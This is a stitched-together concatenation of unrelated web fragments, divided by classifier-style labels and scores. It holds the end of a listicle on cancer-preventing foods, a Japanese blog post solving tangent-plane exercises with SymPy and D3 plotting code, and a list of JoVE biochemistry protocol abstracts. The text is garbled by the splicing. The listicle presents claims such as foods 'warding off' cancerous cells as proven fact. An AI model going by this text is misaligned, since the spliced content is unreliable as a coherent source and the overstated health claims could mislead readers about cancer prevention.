way of incorporating a cancer-busting food into our diet. Garlic is proven to boost immunity, which helps our body fight against nasty cancerous cells. Chives, leeks and onions are also part of the allium vegetable group, which help reduce the risks of stomach, colon and prostate cancer. 5. Flax Seeds Flax seeds contain a strong antioxidants called ligans which help keep cells healthy and safe from cancerous cells. They also contain Omega-3, which are believed to prevent colon cancer.  6. Blueberries Rated as one fo the highest antioxidant foods, blueberries keep the body's cells healthy and full of oxygen, warding off cancerous cells attacking. Source: www.naturalnews.com/037148... christmas-store-2016
__label__pos
0.815488
2018年1月13日土曜日 学習環境 解析入門〈3〉(松坂 和夫(著)、岩波書店)の第14章(多変数の関数)、14.1(微分可能性と勾配ベクトル)、問題6.を取り組んでみる。 1. f x , y = x 2 a 2 + y 2 b 2 n = g r a d f x 0 , y 0 = 2 x 0 a 2 , 2 y 0 b 2 n · x , y = n · x 0 , y 0 2 x 0 x a 2 + 2 y 0 y b 2 = 2 x 0 2 a 2 + 2 y 0 2 b 2 2 x 0 x a 2 + 2 y 0 y b 2 = 2 x 0 x a 2 + y 0 y b 2 = 1 2. f x , y = x 2 + y 2 u = x , y , z g u = f x , y - z g r a d g 1 , - 2 , 5 · x , y , z - 1 , - 2 , 5 = 0 g r a d f 1 , - 2 · x - 1 , y + 2 - z - 5 = 0 2 , - 4 · x - 1 , y + 2 - z - 5 = 0 2 x - 2 - 4 y - 8 - z + 5 = 0 2 x - 4 y - z = 5 3. f x , y , z = x y z n = g r a d f x 0 , y 0 , z 0 = y 0 z 0 , z 0 x 0 , x 0 y 0 n · x , y , z = n · x 0 , y 0 , z 0 x y 0 z 0 + x 0 y z 0 + x 0 y 0 z = 3 x 0 y 0 z 0 x y 0 z 0 + x 0 y z 0 + x 0 y 0 z = 3 4. f x , y = x y u = x , y , z g u = f x , y - z 2 g r a d g 1 , 4 , 2 = x , y , z - 1 , 4 , 2 = 0 g r a d f 1 , 4 · x - 1 , y - 4 - 4 z - 2 = 0 4 x - 1 + y - 4 - 4 z - 2 = 0 4 x + y - 4 z = 0 コード(Emacs) Python 3 #!/usr/bin/env python3 from sympy import pprint, symbols, solve x, y, x0, y0, a, b = symbols('x, y, x0, y0, a, b') eq1 = x ** 2 / a ** 2 + y ** 2 / b ** 2 - 1 eq2 = x0 * x / a ** 2 + y0 * y / b ** 2 - 1 for eq in [eq1, eq2]: pprint(eq) print() for t in solve(eq, y): pprint(t) print() print() 入出力結果(Terminal, Jupyter(IPython)) $ ./sample6.py 2 2 y x -1 + ── + ── 2 2 b a _________________ -b⋅╲╱ (a - x)⋅(a + x) ─────────────────────── a _________________ b⋅╲╱ (a - x)⋅(a + x) ───────────────────── a y⋅y₀ x⋅x₀ -1 + ──── + ──── 2 2 b a 2 ⎛ 2 ⎞ b ⋅⎝a - x⋅x₀⎠ ────────────── 2 a ⋅y₀ $ HTML5 <div id="graph0"></div> <pre id="output0"></pre> <label for="r0">r = </label> <input id="r0" type="number" min="0" value="0.5"> <label for="dx">dx = </label> <input id="dx" type="number" min="0" step="0.0001" value="0.001"> <br> <label for="x1">x1 = </label> <input id="x1" type="number" value="-5"> <label for="x2">x2 = </label> <input id="x2" type="number" value="5"> <br> <label for="y1">y1 = </label> <input id="y1" type="number" value="-5"> <label for="y2">y2 = </label> <input id="y2" type="number" value="5"> <br> <label for="a0">a = </label> <input id="a0" type="number" value="1"> <label for="b0">b = </label> <input id="b0" type="number" value="1"> <label for="x0">x0 = </label> <input id="x0" type="number" value="0"> <label for="y0">y0 = </label> <input id="y0" type="number" value="1"> <button id="draw0">draw</button> <button id="clear0">clear</button> <script type="text/javascript" src="https://cdnjs.cloudflare.com/ajax/libs/d3/4.2.6/d3.min.js" integrity="sha256-5idA201uSwHAROtCops7codXJ0vja+6wbBrZdQ6ETQc=" crossorigin="anonymous"></script> <script src="sample6.js"></script> JavaScript let div0 = document.querySelector('#graph0'), pre0 = document.querySelector('#output0'), width = 600, height = 600, padding = 50, btn0 = document.querySelector('#draw0'), btn1 = document.querySelector('#clear0'), input_r = document.querySelector('#r0'), input_dx = document.querySelector('#dx'), input_x1 = document.querySelector('#x1'), input_x2 = document.querySelector('#x2'), input_y1 = document.querySelector('#y1'), input_y2 = document.querySelector('#y2'), input_a0 = document.querySelector('#a0'), input_b0 = document.querySelector('#b0'), input_x0 = document.querySelector('#x0'), input_y0 = document.querySelector('#y0'), inputs = [input_r, input_dx, input_x1, input_x2, input_y1, input_y2, input_a0, input_b0, input_x0, input_y0], p = (x) => pre0.textContent += x + '\n', range = (start, end, step=1) => { let res = []; for (let i = start; i < end; i += step) { res.push(i); } return res; }; let draw = () => { pre0.textContent = ''; let r = parseFloat(input_r.value), dx = parseFloat(input_dx.value), x1 = parseFloat(input_x1.value), x2 = parseFloat(input_x2.value), y1 = parseFloat(input_y1.value), y2 = parseFloat(input_y2.value), a0 = parseFloat(input_a0.value), b0 = parseFloat(input_b0.value), x0 = parseFloat(input_x0.value), y0 = parseFloat(input_y0.value); if (r === 0 || dx === 0 || x1 > x2 || y1 > y2) { return; } if (x0 ** 2 / a0 ** 2 + y0 ** 2 / b0 ** 2 !== 1) { p(`点(${x0}, ${y0})は楕円上の点ではない`); } let points = [], lines = [], f1 = (x) => -b0 * Math.sqrt(a0 ** 2 - x ** 2) / a0, f2 = (x) => -f1(x), g = (x) => b0 ** 2 * (a0 ** 2 - x * x0) / (a0 ** 2 * y0), fns = [[f1, 'red'], [f2, 'red'], [g, 'green']]; fns .forEach((o) => { let [fn, color] = o; for (let x = x1; x <= x2; x += dx) { let y = fn(x); if (Math.abs(y) < Infinity) { points.push([x, y, color]); } } }); let xscale = d3.scaleLinear() .domain([x1, x2]) .range([padding, width - padding]); let yscale = d3.scaleLinear() .domain([y1, y2]) .range([height - padding, padding]); let xaxis = d3.axisBottom().scale(xscale); let yaxis = d3.axisLeft().scale(yscale); div0.innerHTML = ''; let svg = d3.select('#graph0') .append('svg') .attr('width', width) .attr('height', height); svg.selectAll('circle') .data(points) .enter() .append('circle') .attr('cx', (d) => xscale(d[0])) .attr('cy', (d) => yscale(d[1])) .attr('r', r) .attr('fill', (d) => d[2] || 'green'); svg.selectAll('line') .data([[x1, 0, x2, 0], [0, y1, 0, y2]].concat(lines)) .enter() .append('line') .attr('x1', (d) => xscale(d[0])) .attr('y1', (d) => yscale(d[1])) .attr('x2', (d) => xscale(d[2])) .attr('y2', (d) => yscale(d[3])) .attr('stroke', (d) => d[4] || 'black'); svg.append('g') .attr('transform', `translate(0, ${height - padding})`) .call(xaxis); svg.append('g') .attr('transform', `translate(${padding}, 0)`) .call(yaxis); p(fns.join('\n')); }; inputs.forEach((input) => input.onchange = draw); btn0.onclick = draw; btn1.onclick = () => pre0.textContent = ''; draw(); 0 コメント: コメントを投稿 関連コンテンツ
__label__pos
0.998775
JoVE Visualize What is visualize? Related JoVE Video Pubmed Article A biochemical genomics screen for substrates of Ste20p kinase enables the in silico prediction of novel substrates. PLoS ONE PUBLISHED: 08-17-2009 The Ste20/PAK family is involved in many cellular processes, including the regulation of actin-based cytoskeletal dynamics and the activation of MAPK signaling pathways. Despite its numerous roles, few of its substrates have been identified. To better characterize the roles of the yeast Ste20p kinase, we developed an in vitro biochemical genomics screen to identify its substrates. When applied to 539 purified yeast proteins, the screen reported 14 targets of Ste20p phosphorylation. We used the data resulting from our screen to build an in silico predictor to identify Ste20p substrates on a proteome-wide basis. Since kinase-substrate specificity is often mediated by additional binding events at sites distal to the phosphorylation site, the predictor uses the presence/absence of multiple sequence motifs to evaluate potential substrates. Statistical validation estimates a threefold improvement in substrate recovery over random predictions, despite the lack of a single dominant motif that can characterize Ste20p phosphorylation. The set of predicted substrates significantly overrepresents elements of the genetic and physical interaction networks surrounding Ste20p, suggesting that some of the predicted substrates are in vivo targets. We validated this combined experimental and computational approach for identifying kinase substrates by confirming the in vitro phosphorylation of polarisome components Bni1p and Bud6p, thus suggesting a mechanism by which Ste20p effects polarized growth. Authors: Srikanth Kudithipudi, Denis Kusevic, Sara Weirich, Albert Jeltsch. Published: 11-29-2014 ABSTRACT Lysine methylation is an emerging post-translation modification and it has been identified on several histone and non-histone proteins, where it plays crucial roles in cell development and many diseases. Approximately 5,000 lysine methylation sites were identified on different proteins, which are set by few dozens of protein lysine methyltransferases. This suggests that each PKMT methylates multiple proteins, however till now only one or two substrates have been identified for several of these enzymes. To approach this problem, we have introduced peptide array based substrate specificity analyses of PKMTs. Peptide arrays are powerful tools to characterize the specificity of PKMTs because methylation of several substrates with different sequences can be tested on one array. We synthesized peptide arrays on cellulose membrane using an Intavis SPOT synthesizer and analyzed the specificity of various PKMTs. Based on the results, for several of these enzymes, novel substrates could be identified. For example, for NSD1 by employing peptide arrays, we showed that it methylates K44 of H4 instead of the reported H4K20 and in addition H1.5K168 is the highly preferred substrate over the previously known H3K36. Hence, peptide arrays are powerful tools to biochemically characterize the PKMTs. 24 Related JoVE Articles! Play Button In vitro Methylation Assay to Study Protein Arginine Methylation Authors: Rama Kamesh Bikkavilli, Sreedevi Avasarala, Michelle Van Scoyk, Manoj Kumar Karuppusamy Rathinam, Jordi Tauler, Stanley Borowicz, Robert A. Winn. Institutions: University of Illinois at Chicago, University of Illinois at Chicago, Jesse Brown Veterans Affairs Medical Center. Protein arginine methylation is one of the most abundant post-translational modifications in the nucleus. Protein arginine methylation can be identified and/or determined via proteomic approaches, and/or immunoblotting with methyl-arginine specific antibodies. However, these techniques sometimes can be misleading and often provide false positive results. Most importantly, these techniques cannot provide direct evidence in support of the PRMT substrate specificity. In vitro methylation assays, on the other hand, are useful biochemical assays, which are sensitive, and consistently reveal if the identified proteins are indeed PRMT substrates. A typical in vitro methylation assay includes purified, active PRMTs, purified substrate and a radioisotope labeled methyl donor (S-adenosyl-L-[methyl-3H] methionine). Here we describe a step-by-step protocol to isolate catalytically active PRMT1, a ubiquitously expressed PRMT family member. The methyl transferase activities of the purified PRMT1 were later tested on Ras-GTPase activating protein binding protein 1 (G3BP1), a known PRMT substrate, in the presence of S-adenosyl-L-[methyl-3H] methionine as the methyl donor. This protocol can be employed not only for establishing the methylation status of novel physiological PRMT1 substrates, but also for understanding the basic mechanism of protein arginine methylation. Genetics, Issue 92, PRMT, protein methylation, SAMe, arginine, methylated proteins, methylation assay 51997 Play Button Pull-down of Calmodulin-binding Proteins Authors: Kanwardeep S. Kaleka, Amber N. Petersen, Matthew A. Florence, Nashaat Z. Gerges. Institutions: Medical College of Wisconsin . Calcium (Ca2+) is an ion vital in regulating cellular function through a variety of mechanisms. Much of Ca2+ signaling is mediated through the calcium-binding protein known as calmodulin (CaM)1,2. CaM is involved at multiple levels in almost all cellular processes, including apoptosis, metabolism, smooth muscle contraction, synaptic plasticity, nerve growth, inflammation and the immune response. A number of proteins help regulate these pathways through their interaction with CaM. Many of these interactions depend on the conformation of CaM, which is distinctly different when bound to Ca2+ (Ca2+-CaM) as opposed to its Ca2+-free state (ApoCaM)3. While most target proteins bind Ca2+-CaM, certain proteins only bind to ApoCaM. Some bind CaM through their IQ-domain, including neuromodulin4, neurogranin (Ng)5, and certain myosins6. These proteins have been shown to play important roles in presynaptic function7, postsynaptic function8, and muscle contraction9, respectively. Their ability to bind and release CaM in the absence or presence of Ca2+ is pivotal in their function. In contrast, many proteins only bind Ca2+-CaM and require this binding for their activation. Examples include myosin light chain kinase10, Ca2+/CaM-dependent kinases (CaMKs)11 and phosphatases (e.g. calcineurin)12, and spectrin kinase13, which have a variety of direct and downstream effects14. The effects of these proteins on cellular function are often dependent on their ability to bind to CaM in a Ca2+-dependent manner. For example, we tested the relevance of Ng-CaM binding in synaptic function and how different mutations affect this binding. We generated a GFP-tagged Ng construct with specific mutations in the IQ-domain that would change the ability of Ng to bind CaM in a Ca2+-dependent manner. The study of these different mutations gave us great insight into important processes involved in synaptic function8,15. However, in such studies, it is essential to demonstrate that the mutated proteins have the expected altered binding to CaM. Here, we present a method for testing the ability of proteins to bind to CaM in the presence or absence of Ca2+, using CaMKII and Ng as examples. This method is a form of affinity chromatography referred to as a CaM pull-down assay. It uses CaM-Sepharose beads to test proteins that bind to CaM and the influence of Ca2+ on this binding. It is considerably more time efficient and requires less protein relative to column chromatography and other assays. Altogether, this provides a valuable tool to explore Ca2+/CaM signaling and proteins that interact with CaM. Molecular BIology, Issue 59, Calmodulin, calcium, IQ-motif, affinity chromatography, pull-down, Ca2+/Calmodulin-dependent Kinase II, neurogranin 3502 Play Button Direct Detection of the Acetate-forming Activity of the Enzyme Acetate Kinase Authors: Matthew L. Fowler, Cheryl J. Ingram-Smith, Kerry S. Smith. Institutions: Clemson University. Acetate kinase, a member of the acetate and sugar kinase-Hsp70-actin (ASKHA) enzyme superfamily1-5, is responsible for the reversible phosphorylation of acetate to acetyl phosphate utilizing ATP as a substrate. Acetate kinases are ubiquitous in the Bacteria, found in one genus of Archaea, and are also present in microbes of the Eukarya6. The most well characterized acetate kinase is that from the methane-producing archaeon Methanosarcina thermophila7-14. An acetate kinase which can only utilize PPi but not ATP in the acetyl phosphate-forming direction has been isolated from Entamoeba histolytica, the causative agent of amoebic dysentery, and has thus far only been found in this genus15,16. In the direction of acetyl phosphate formation, acetate kinase activity is typically measured using the hydroxamate assay, first described by Lipmann17-20, a coupled assay in which conversion of ATP to ADP is coupled to oxidation of NADH to NAD+ by the enzymes pyruvate kinase and lactate dehydrogenase21,22, or an assay measuring release of inorganic phosphate after reaction of the acetyl phosphate product with hydroxylamine23. Activity in the opposite, acetate-forming direction is measured by coupling ATP formation from ADP to the reduction of NADP+ to NADPH by the enzymes hexokinase and glucose 6-phosphate dehydrogenase24. Here we describe a method for the detection of acetate kinase activity in the direction of acetate formation that does not require coupling enzymes, but is instead based on direct determination of acetyl phosphate consumption. After the enzymatic reaction, remaining acetyl phosphate is converted to a ferric hydroxamate complex that can be measured spectrophotometrically, as for the hydroxamate assay. Thus, unlike the standard coupled assay for this direction that is dependent on the production of ATP from ADP, this direct assay can be used for acetate kinases that produce ATP or PPi. Molecular Biology, Issue 58, Acetate kinase, acetate, acetyl phosphate, pyrophosphate, PPi, ATP 3474 Play Button Identifying Protein-protein Interaction Sites Using Peptide Arrays Authors: Hadar Amartely, Anat Iosub-Amir, Assaf Friedler. Institutions: The Hebrew University of Jerusalem. Protein-protein interactions mediate most of the processes in the living cell and control homeostasis of the organism. Impaired protein interactions may result in disease, making protein interactions important drug targets. It is thus highly important to understand these interactions at the molecular level. Protein interactions are studied using a variety of techniques ranging from cellular and biochemical assays to quantitative biophysical assays, and these may be performed either with full-length proteins, with protein domains or with peptides. Peptides serve as excellent tools to study protein interactions since peptides can be easily synthesized and allow the focusing on specific interaction sites. Peptide arrays enable the identification of the interaction sites between two proteins as well as screening for peptides that bind the target protein for therapeutic purposes. They also allow high throughput SAR studies. For identification of binding sites, a typical peptide array usually contains partly overlapping 10-20 residues peptides derived from the full sequences of one or more partner proteins of the desired target protein. Screening the array for binding the target protein reveals the binding peptides, corresponding to the binding sites in the partner proteins, in an easy and fast method using only small amount of protein. In this article we describe a protocol for screening peptide arrays for mapping the interaction sites between a target protein and its partners. The peptide array is designed based on the sequences of the partner proteins taking into account their secondary structures. The arrays used in this protocol were Celluspots arrays prepared by INTAVIS Bioanalytical Instruments. The array is blocked to prevent unspecific binding and then incubated with the studied protein. Detection using an antibody reveals the binding peptides corresponding to the specific interaction sites between the proteins. Molecular Biology, Issue 93, peptides, peptide arrays, protein-protein interactions, binding sites, peptide synthesis, micro-arrays 52097 Play Button A High Throughput MHC II Binding Assay for Quantitative Analysis of Peptide Epitopes Authors: Regina Salvat, Leonard Moise, Chris Bailey-Kellogg, Karl E. Griswold. Institutions: Dartmouth College, University of Rhode Island, Dartmouth College. Biochemical assays with recombinant human MHC II molecules can provide rapid, quantitative insights into immunogenic epitope identification, deletion, or design1,2. Here, a peptide-MHC II binding assay is scaled to 384-well format. The scaled down protocol reduces reagent costs by 75% and is higher throughput than previously described 96-well protocols1,3-5. Specifically, the experimental design permits robust and reproducible analysis of up to 15 peptides against one MHC II allele per 384-well ELISA plate. Using a single liquid handling robot, this method allows one researcher to analyze approximately ninety test peptides in triplicate over a range of eight concentrations and four MHC II allele types in less than 48 hr. Others working in the fields of protein deimmunization or vaccine design and development may find the protocol to be useful in facilitating their own work. In particular, the step-by-step instructions and the visual format of JoVE should allow other users to quickly and easily establish this methodology in their own labs. Biochemistry, Issue 85, Immunoassay, Protein Immunogenicity, MHC II, T cell epitope, High Throughput Screen, Deimmunization, Vaccine Design 51308 Play Button Fabricating Complex Culture Substrates Using Robotic Microcontact Printing (R-µCP) and Sequential Nucleophilic Substitution Authors: Gavin T. Knight, Tyler Klann, Jason D. McNulty, Randolph S. Ashton. Institutions: University of Wisconsin, Madison, University of Wisconsin, Madison. In tissue engineering, it is desirable to exhibit spatial control of tissue morphology and cell fate in culture on the micron scale. Culture substrates presenting grafted poly(ethylene glycol) (PEG) brushes can be used to achieve this task by creating microscale, non-fouling and cell adhesion resistant regions as well as regions where cells participate in biospecific interactions with covalently tethered ligands. To engineer complex tissues using such substrates, it will be necessary to sequentially pattern multiple PEG brushes functionalized to confer differential bioactivities and aligned in microscale orientations that mimic in vivo niches. Microcontact printing (μCP) is a versatile technique to pattern such grafted PEG brushes, but manual μCP cannot be performed with microscale precision. Thus, we combined advanced robotics with soft-lithography techniques and emerging surface chemistry reactions to develop a robotic microcontact printing (R-μCP)-assisted method for fabricating culture substrates with complex, microscale, and highly ordered patterns of PEG brushes presenting orthogonal ‘click’ chemistries. Here, we describe in detail the workflow to manufacture such substrates. Bioengineering, Issue 92, Robotic microcontact printing, R-μCP, click chemistry, surface chemistry, tissue engineering, micropattern, advanced manufacturing 52186 Play Button Atomically Defined Templates for Epitaxial Growth of Complex Oxide Thin Films Authors: A. Petra Dral, David Dubbink, Maarten Nijland, Johan E. ten Elshof, Guus Rijnders, Gertjan Koster. Institutions: University of Twente. Atomically defined substrate surfaces are prerequisite for the epitaxial growth of complex oxide thin films. In this protocol, two approaches to obtain such surfaces are described. The first approach is the preparation of single terminated perovskite SrTiO3 (001) and DyScO3 (110) substrates. Wet etching was used to selectively remove one of the two possible surface terminations, while an annealing step was used to increase the smoothness of the surface. The resulting single terminated surfaces allow for the heteroepitaxial growth of perovskite oxide thin films with high crystalline quality and well-defined interfaces between substrate and film. In the second approach, seed layers for epitaxial film growth on arbitrary substrates were created by Langmuir-Blodgett (LB) deposition of nanosheets. As model system Ca2Nb3O10- nanosheets were used, prepared by delamination of their layered parent compound HCa2Nb3O10. A key advantage of creating seed layers with nanosheets is that relatively expensive and size-limited single crystalline substrates can be replaced by virtually any substrate material. Chemistry, Issue 94, Substrates, oxides, perovskites, epitaxy, thin films, single termination, surface treatment, nanosheets, Langmuir-Blodgett 52209 Play Button Nucleoside Triphosphates - From Synthesis to Biochemical Characterization Authors: Marcel Hollenstein, Christine Catherine Smith, Michael Räz. Institutions: University of Bern. The traditional strategy for the introduction of chemical functionalities is the use of solid-phase synthesis by appending suitably modified phosphoramidite precursors to the nascent chain. However, the conditions used during the synthesis and the restriction to rather short sequences hamper the applicability of this methodology. On the other hand, modified nucleoside triphosphates are activated building blocks that have been employed for the mild introduction of numerous functional groups into nucleic acids, a strategy that paves the way for the use of modified nucleic acids in a wide-ranging palette of practical applications such as functional tagging and generation of ribozymes and DNAzymes. One of the major challenges resides in the intricacy of the methodology leading to the isolation and characterization of these nucleoside analogues. In this video article, we present a detailed protocol for the synthesis of these modified analogues using phosphorous(III)-based reagents. In addition, the procedure for their biochemical characterization is divulged, with a special emphasis on primer extension reactions and TdT tailing polymerization. This detailed protocol will be of use for the crafting of modified dNTPs and their further use in chemical biology. Chemistry, Issue 86, Nucleic acid analogues, Bioorganic Chemistry, PCR, primer extension reactions, organic synthesis, PAGE, HPLC, nucleoside triphosphates 51385 Play Button An Inverse Analysis Approach to the Characterization of Chemical Transport in Paints Authors: Matthew P. Willis, Shawn M. Stevenson, Thomas P. Pearl, Brent A. Mantooth. Institutions: U.S. Army Edgewood Chemical Biological Center, OptiMetrics, Inc., a DCS Company. The ability to directly characterize chemical transport and interactions that occur within a material (i.e., subsurface dynamics) is a vital component in understanding contaminant mass transport and the ability to decontaminate materials. If a material is contaminated, over time, the transport of highly toxic chemicals (such as chemical warfare agent species) out of the material can result in vapor exposure or transfer to the skin, which can result in percutaneous exposure to personnel who interact with the material. Due to the high toxicity of chemical warfare agents, the release of trace chemical quantities is of significant concern. Mapping subsurface concentration distribution and transport characteristics of absorbed agents enables exposure hazards to be assessed in untested conditions. Furthermore, these tools can be used to characterize subsurface reaction dynamics to ultimately design improved decontaminants or decontamination procedures. To achieve this goal, an inverse analysis mass transport modeling approach was developed that utilizes time-resolved mass spectroscopy measurements of vapor emission from contaminated paint coatings as the input parameter for calculation of subsurface concentration profiles. Details are provided on sample preparation, including contaminant and material handling, the application of mass spectrometry for the measurement of emitted contaminant vapor, and the implementation of inverse analysis using a physics-based diffusion model to determine transport properties of live chemical warfare agents including distilled mustard (HD) and the nerve agent VX. Chemistry, Issue 90, Vacuum, vapor emission, chemical warfare agent, contamination, mass transport, inverse analysis, volatile organic compound, paint, coating 51825 Play Button A Toolkit to Enable Hydrocarbon Conversion in Aqueous Environments Authors: Eva K. Brinkman, Kira Schipper, Nadine Bongaerts, Mathias J. Voges, Alessandro Abate, S. Aljoscha Wahl. Institutions: Delft University of Technology, Delft University of Technology. This work puts forward a toolkit that enables the conversion of alkanes by Escherichia coli and presents a proof of principle of its applicability. The toolkit consists of multiple standard interchangeable parts (BioBricks)9 addressing the conversion of alkanes, regulation of gene expression and survival in toxic hydrocarbon-rich environments. A three-step pathway for alkane degradation was implemented in E. coli to enable the conversion of medium- and long-chain alkanes to their respective alkanols, alkanals and ultimately alkanoic-acids. The latter were metabolized via the native β-oxidation pathway. To facilitate the oxidation of medium-chain alkanes (C5-C13) and cycloalkanes (C5-C8), four genes (alkB2, rubA3, rubA4and rubB) of the alkane hydroxylase system from Gordonia sp. TF68,21 were transformed into E. coli. For the conversion of long-chain alkanes (C15-C36), theladA gene from Geobacillus thermodenitrificans was implemented. For the required further steps of the degradation process, ADH and ALDH (originating from G. thermodenitrificans) were introduced10,11. The activity was measured by resting cell assays. For each oxidative step, enzyme activity was observed. To optimize the process efficiency, the expression was only induced under low glucose conditions: a substrate-regulated promoter, pCaiF, was used. pCaiF is present in E. coli K12 and regulates the expression of the genes involved in the degradation of non-glucose carbon sources. The last part of the toolkit - targeting survival - was implemented using solvent tolerance genes, PhPFDα and β, both from Pyrococcus horikoshii OT3. Organic solvents can induce cell stress and decreased survivability by negatively affecting protein folding. As chaperones, PhPFDα and β improve the protein folding process e.g. under the presence of alkanes. The expression of these genes led to an improved hydrocarbon tolerance shown by an increased growth rate (up to 50%) in the presences of 10% n-hexane in the culture medium were observed. Summarizing, the results indicate that the toolkit enables E. coli to convert and tolerate hydrocarbons in aqueous environments. As such, it represents an initial step towards a sustainable solution for oil-remediation using a synthetic biology approach. Bioengineering, Issue 68, Microbiology, Biochemistry, Chemistry, Chemical Engineering, Oil remediation, alkane metabolism, alkane hydroxylase system, resting cell assay, prefoldin, Escherichia coli, synthetic biology, homologous interaction mapping, mathematical model, BioBrick, iGEM 4182 Play Button Substrate Generation for Endonucleases of CRISPR/Cas Systems Authors: Judith Zoephel, Srivatsa Dwarakanath, Hagen Richter, André Plagens, Lennart Randau. Institutions: Max-Planck-Institute for Terrestrial Microbiology. The interaction of viruses and their prokaryotic hosts shaped the evolution of bacterial and archaeal life. Prokaryotes developed several strategies to evade viral attacks that include restriction modification, abortive infection and CRISPR/Cas systems. These adaptive immune systems found in many Bacteria and most Archaea consist of clustered regularly interspaced short palindromic repeat (CRISPR) sequences and a number of CRISPR associated (Cas) genes (Fig. 1) 1-3. Different sets of Cas proteins and repeats define at least three major divergent types of CRISPR/Cas systems 4. The universal proteins Cas1 and Cas2 are proposed to be involved in the uptake of viral DNA that will generate a new spacer element between two repeats at the 5' terminus of an extending CRISPR cluster 5. The entire cluster is transcribed into a precursor-crRNA containing all spacer and repeat sequences and is subsequently processed by an enzyme of the diverse Cas6 family into smaller crRNAs 6-8. These crRNAs consist of the spacer sequence flanked by a 5' terminal (8 nucleotides) and a 3' terminal tag derived from the repeat sequence 9. A repeated infection of the virus can now be blocked as the new crRNA will be directed by a Cas protein complex (Cascade) to the viral DNA and identify it as such via base complementarity10. Finally, for CRISPR/Cas type 1 systems, the nuclease Cas3 will destroy the detected invader DNA 11,12 . These processes define CRISPR/Cas as an adaptive immune system of prokaryotes and opened a fascinating research field for the study of the involved Cas proteins. The function of many Cas proteins is still elusive and the causes for the apparent diversity of the CRISPR/Cas systems remain to be illuminated. Potential activities of most Cas proteins were predicted via detailed computational analyses. A major fraction of Cas proteins are either shown or proposed to function as endonucleases 4. Here, we present methods to generate crRNAs and precursor-cRNAs for the study of Cas endoribonucleases. Different endonuclease assays require either short repeat sequences that can directly be synthesized as RNA oligonucleotides or longer crRNA and pre-crRNA sequences that are generated via in vitro T7 RNA polymerase run-off transcription. This methodology allows the incorporation of radioactive nucleotides for the generation of internally labeled endonuclease substrates and the creation of synthetic or mutant crRNAs. Cas6 endonuclease activity is utilized to mature pre-crRNAs into crRNAs with 5'-hydroxyl and a 2',3'-cyclic phosphate termini. Molecular biology, Issue 67, CRISPR/Cas, endonuclease, in vitro transcription, crRNA, Cas6 4277 Play Button Assaying the Kinase Activity of LRRK2 in vitro Authors: Patrick A. Lewis. Institutions: UCL Institute of Neurology. Leucine Rich Repeat Kinase 2 (LRRK2) is a 2527 amino acid member of the ROCO family of proteins, possessing a complex, multidomain structure including a GTPase domain (termed ROC, for Ras of Complex proteins) and a kinase domain1. The discovery in 2004 of mutations in LRRK2 that cause Parkinson's disease (PD) resulted in LRRK2 being the focus of a huge volume of research into its normal function and how the protein goes awry in the disease state2,3. Initial investigations into the function of LRRK2 focused on its enzymatic activities4-6. Although a clear picture has yet to emerge of a consistent alteration in these due to mutations, data from a number of groups has highlighted the importance of the kinase activity of LRRK2 in cell death linked to mutations7,8. Recent publications have reported inhibitors targeting the kinase activity of LRRK2, providing a key experimental tool9-11. In light of these data, it is likely that the enzymatic properties of LRRK2 afford us an important window into the biology of this protein, although whether they are potential drug targets for Parkinson's is open to debate. A number of different approaches have been used to assay the kinase activity of LRRK2. Initially, assays were carried out using epitope tagged protein overexpressed in mammalian cell lines and immunoprecipitated, with the assays carried out using this protein immobilised on agarose beads4,5,7. Subsequently, purified recombinant fragments of LRRK2 in solution have also been used, for example a GST tagged fragment purified from insect cells containing residues 970 to 2527 of LRRK212. Recently, Daniëls et al. reported the isolation of full length LRRK2 in solution from human embryonic kidney cells, however this protein is not widely available13. In contrast, the GST fusion truncated form of LRRK2 is commercially available (from Invitrogen, see table 1 for details), and provides a convenient tool for demonstrating an assay for LRRK2 kinase activity. Several different outputs for LRRK2 kinase activity have been reported. Autophosphorylation of LRRK2 itself, phosphorylation of Myelin Basic Protein (MBP) as a generic kinase substrate and phosphorylation of an artificial substrate - dubbed LRRKtide, based upon phosphorylation of threonine 558 in Moesin - have all been used, as have a series of putative physiological substrates including α-synuclein, Moesin and 4-EBP14-17. The status of these proteins as substrates for LRRK2 remains unclear, and as such the protocol described below will focus on using MBP as a generic substrate, noting the utility of this system to assay LRRK2 kinase activity directed against a range of potential substrates. Molecular Biology, Issue 59, Kinase, LRRK2, Parkinson's disease 3495 Play Button DNA-affinity-purified Chip (DAP-chip) Method to Determine Gene Targets for Bacterial Two component Regulatory Systems Authors: Lara Rajeev, Eric G. Luning, Aindrila Mukhopadhyay. Institutions: Lawrence Berkeley National Laboratory. In vivo methods such as ChIP-chip are well-established techniques used to determine global gene targets for transcription factors. However, they are of limited use in exploring bacterial two component regulatory systems with uncharacterized activation conditions. Such systems regulate transcription only when activated in the presence of unique signals. Since these signals are often unknown, the in vitro microarray based method described in this video article can be used to determine gene targets and binding sites for response regulators. This DNA-affinity-purified-chip method may be used for any purified regulator in any organism with a sequenced genome. The protocol involves allowing the purified tagged protein to bind to sheared genomic DNA and then affinity purifying the protein-bound DNA, followed by fluorescent labeling of the DNA and hybridization to a custom tiling array. Preceding steps that may be used to optimize the assay for specific regulators are also described. The peaks generated by the array data analysis are used to predict binding site motifs, which are then experimentally validated. The motif predictions can be further used to determine gene targets of orthologous response regulators in closely related species. We demonstrate the applicability of this method by determining the gene targets and binding site motifs and thus predicting the function for a sigma54-dependent response regulator DVU3023 in the environmental bacterium Desulfovibrio vulgaris Hildenborough. Genetics, Issue 89, DNA-Affinity-Purified-chip, response regulator, transcription factor binding site, two component system, signal transduction, Desulfovibrio, lactate utilization regulator, ChIP-chip 51715 Play Button Protein WISDOM: A Workbench for In silico De novo Design of BioMolecules Authors: James Smadbeck, Meghan B. Peterson, George A. Khoury, Martin S. Taylor, Christodoulos A. Floudas. Institutions: Princeton University. The aim of de novo protein design is to find the amino acid sequences that will fold into a desired 3-dimensional structure with improvements in specific properties, such as binding affinity, agonist or antagonist behavior, or stability, relative to the native sequence. Protein design lies at the center of current advances drug design and discovery. Not only does protein design provide predictions for potentially useful drug targets, but it also enhances our understanding of the protein folding process and protein-protein interactions. Experimental methods such as directed evolution have shown success in protein design. However, such methods are restricted by the limited sequence space that can be searched tractably. In contrast, computational design strategies allow for the screening of a much larger set of sequences covering a wide variety of properties and functionality. We have developed a range of computational de novo protein design methods capable of tackling several important areas of protein design. These include the design of monomeric proteins for increased stability and complexes for increased binding affinity. To disseminate these methods for broader use we present Protein WISDOM (http://www.proteinwisdom.org), a tool that provides automated methods for a variety of protein design problems. Structural templates are submitted to initialize the design process. The first stage of design is an optimization sequence selection stage that aims at improving stability through minimization of potential energy in the sequence space. Selected sequences are then run through a fold specificity stage and a binding affinity stage. A rank-ordered list 